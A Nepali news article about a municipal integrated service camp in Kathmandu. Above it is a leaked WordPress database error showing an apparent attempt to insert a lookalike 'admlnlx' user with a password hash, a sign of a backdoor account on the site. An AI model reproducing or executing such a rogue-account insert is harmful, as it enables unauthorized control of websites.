WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BMmDctVt6Xk1QL3MKindqJLfCswMAu1', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-12 17:11:51', '', 'admlnlx', 'admlnlx')
काठमाण्डौ । माप्य दुधकोशी गाउँपालिकाले काठमाडौंमा सुरु गरेको एकीकृत शिबिको पहिलो दिन ४५५ जनाले सेवा लिएका छन् ।
सुकेधारा स्थित नवदुर्ग पार्टी भेनुमा आजबाट सन्चालन भएको एकीकृत सेवा प्रवाह शिविरको पहिलो दिन ४५५ जनाले सेवा लिएको माप्य दुधकोशी गाउँपालिका प्रबक्ता अमित राईले जानकारी दिए ।
बर्खायाम भएका कारण आवागमनमा समस्या भएर गाउँपालिकासम्म पुग्न कठिनाई हुने भएका कारण काठमाडौंमा आएर बसोबास गरिरहेका स्थानीयहरुलाई सहज रूपमा सेवा उपलब्ध गराउने उद्वेश्याले दुईदिने एकीकृत सिबिर सन्चालन गरिएको गाउँपालिका अध्यक्षा बुद्विकिरण राईले बताए ।
एकीकृत सेवा प्रवाह शिबिरमा सामाजिक सुरक्षा भत्ता दर्ता तथा नविकरण, मालपोत तथा भुमि कर संकलन, जन्म मृत्यु दर्ता, बसाई सराई, राष्ट्रिय परिचय पत्र वितरण लगायतका सेवा प्रवाह भइ रहेको माप्य दुधकोशी गाउँपालिकाका प्रबक्ता राईले जानकारी दिए ।